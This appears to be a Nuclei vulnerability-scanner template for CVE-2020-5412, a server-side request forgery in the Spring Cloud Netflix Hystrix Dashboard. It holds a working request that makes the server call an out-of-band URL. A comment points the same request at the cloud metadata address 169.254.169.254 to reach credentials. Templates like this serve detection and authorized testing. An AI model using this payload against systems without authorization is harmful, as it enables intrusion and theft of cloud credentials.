46 lines
1.4 KiB
YAML
46 lines
1.4 KiB
YAML
id: CVE-2020-5412
|
|
|
|
info:
|
|
name: Spring Cloud Netflix - Server-Side Request Forgery
|
|
author: dwisiswant0
|
|
severity: medium
|
|
description: Spring Cloud Netflix 2.2.x prior to 2.2.4, 2.1.x prior to 2.1.6, and older unsupported versions are susceptible to server-side request forgery. Applications can use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. An attacker can send a request to other servers and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
|
|
reference:
|
|
- https://tanzu.vmware.com/security/cve-2020-5412
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-5412
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2020-5412
|
|
cwe-id: CWE-610
|
|
cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:*
|
|
epss-score: 0.03435
|
|
tags: cve,cve2020,ssrf,springcloud
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"
|
|
|
|
# To get crithit, try http://169.254.169.254/latest/metadata/
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "Jelly"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by md on 2023/04/04
|